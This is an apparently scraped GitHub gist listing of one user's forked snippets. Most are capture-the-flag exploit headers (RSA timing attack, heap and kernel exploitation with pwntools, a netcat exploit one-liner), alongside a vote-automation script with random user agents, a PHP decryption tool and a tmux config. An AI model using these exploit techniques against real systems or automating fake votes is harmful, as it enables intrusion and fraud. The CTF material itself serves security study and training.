@elnx
elnx / rsa_timing_attack_d_Montgomery.py
Created May 9, 2017 02:09 — forked from hellman/rsa_timing_attack_d_Montgomery.py
DEF CON 2017 Quals - Godzilla (Reverse/Crypto)
#-*- coding:utf-8 -*-
'''
DEF CON 2017 Quals - Godzilla (Reverse)
Timing attack on RSA decryption.
Based on http://www.cs.jhu.edu/~fabian/courses/CS600.624/Timing-full.pdf
Other solutions:
https://gist.github.com/nneonneo/367240ae2d8e705bb9173a49a7c8b0cd by b2xiao
https://gist.github.com/Riatre/caac24840b176cf843b3f66ad9a5eeaf by riatre
@elnx
elnx / vote.py
Created May 20, 2017 09:56 — forked from jackyyf/vote.py
Gist by paste.py @ 2017-05-12 02:48:45.276199
import requests
import gevent
from gevent import monkey; monkey.patch_all(); del monkey
import random
import time
concurrent = 8
delay = 0.5
def get_user_agent():
@elnx
elnx / rdwr.py
Created July 13, 2017 08:59 — forked from vagelim/rdwr.py
Direct read/write access to Python's memory
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
@elnx
elnx / vwdecode.php
Created July 17, 2017 08:00 — forked from Wind4/vwdecode.php
Weidun PHP Encryption Expert decryption algorithm By:Neeao
<?php
/***********************************
* Weidun PHP Encryption Expert decryption algorithm By:Neeao
* http://Neeao.com
* 2009-09-10
***********************************/
$filename="index.php"; // file to decrypt
$lines = file($filename); // lines 0, 1, 2
#!/usr/bin/env python
# coding:utf-8
import sys
import time
from pwn import *
from clemency import *
def exploit(host):
@elnx
elnx / doit
Created December 29, 2017 22:47 — forked from eboda/doit
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
# Use UTF8
#set -g utf8
#set -g status-utf8 on
#setw -g utf8 on
# Use zsh as default shell
set-option -g default-shell /bin/zsh
# Support for 256 colors
set -g default-terminal "screen-256color"
@elnx
elnx / heapstorm2.py
Created April 2, 2018 03:10 — forked from Jackyxty/heapstorm2.py
Official solution for "Heap Storm II" of 0CTF/TCTF 2018 Quals
#!/usr/bin/env python
# encoding: utf-8
#flag{Seize it, control it, and exploit it. Welcome to the House of Storm.}
import itertools
from hashlib import sha256
from pwn import remote, process, ELF
from pwn import context
from pwn import p32,p64,u32,u64
@elnx
elnx / zerofs.c
Created April 2, 2018 03:11 — forked from tarafans/zerofs.c
zerofs.c
/*
config: KASLR + SMEP + RANDOM_STRUCT
In llseek, I only check whether the offset is smaller than file_size or not.
However, the image can be crafted by the attacker. After reversing the disk
layout of the image, the attacker can mount an image which contains a normal
file having file size 0x7fffffffffffffff.
With llseek, kernel memory read and write can be achieved.
But the implemented llseek only supports positive seeking, which means that
the attacker cannot access the data before the buffer of the file.
This creates certain difficulties.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
code = ELF('./babystack')
context.arch = code.arch
context.log_level = 'debug'
gadget = lambda x: next(code.search(asm(x, os='linux', arch=code.arch)))
if len(sys.argv) > 2:
r = remote(sys.argv[1], int(sys.argv[2]))